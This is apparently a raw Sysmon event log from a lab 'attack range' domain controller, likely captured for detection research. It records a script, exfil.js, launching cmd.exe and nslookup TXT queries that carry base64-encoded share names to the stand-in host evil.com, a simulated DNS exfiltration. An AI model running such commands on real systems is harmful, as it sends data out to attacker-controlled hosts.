23542300x8000000000000000202128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.913{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvjikpm.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.897{2E1864BB-17C5-629A-2341-000000005F02}41767768C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-2441-000000005F02}7528C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.897{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2441-000000005F02}7528C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.897{2E1864BB-17C5-629A-2241-000000005F02}42487556C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-2441-000000005F02}7528C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.905{2E1864BB-17C5-629A-2441-000000005F02}7528C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-2241-000000005F02}4248C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvjikpm.tmp 2>&1 10341000x8000000000000000202119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.882{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2341-000000005F02}4176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.882{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2341-000000005F02}4176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.882{2E1864BB-17C5-629A-2341-000000005F02}41767768C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-2241-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2341-000000005F02}4176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2241-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-17A1-629A-783D-000000005F02}55528C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-2241-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.870{2E1864BB-17C5-629A-2241-000000005F02}4248C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvjikpm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.866{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxexsc.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.835{2E1864BB-17C5-629A-2041-000000005F02}16925156C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-2141-000000005F02}7668C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.835{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.835{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.835{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.835{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.835{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2141-000000005F02}7668C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.835{2E1864BB-17C5-629A-1F41-000000005F02}26727436C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-2141-000000005F02}7668C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.841{2E1864BB-17C5-629A-2141-000000005F02}7668C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-1F41-000000005F02}2672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxexsc.tmp 2>&1 10341000x8000000000000000202099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.813{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2041-000000005F02}1692C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.813{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2041-000000005F02}1692C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.813{2E1864BB-17C5-629A-2041-000000005F02}16925156C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1F41-000000005F02}2672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.797{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2041-000000005F02}1692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 